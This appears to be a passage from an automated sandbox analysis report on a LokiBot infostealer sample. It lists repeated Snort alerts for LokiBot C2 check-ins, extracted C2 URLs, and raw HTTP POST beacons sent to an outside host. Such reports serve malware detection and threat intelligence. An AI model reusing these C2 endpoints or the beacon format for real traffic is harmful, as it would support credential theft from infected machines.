                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49860 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49863 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49864 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49870 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49871 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49872 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49873 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49875 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49876 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49878 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49890 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49897 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49905 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49910 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49911 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49912 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49913 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49914 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49915 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49916 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49918 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49921 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49923 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49924 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49925 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49926 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49927 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49928 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49929 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49930 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49931 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49932 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49933 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49934 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49935 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49936 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49937 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49938 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49939 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49939 -> 172.67.219.104:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewIP Address: 172.67.219.104 172.67.219.104
                Source: Joe Sandbox ViewIP Address: 104.21.62.32 104.21.62.32
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
                Source: global trafficHTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
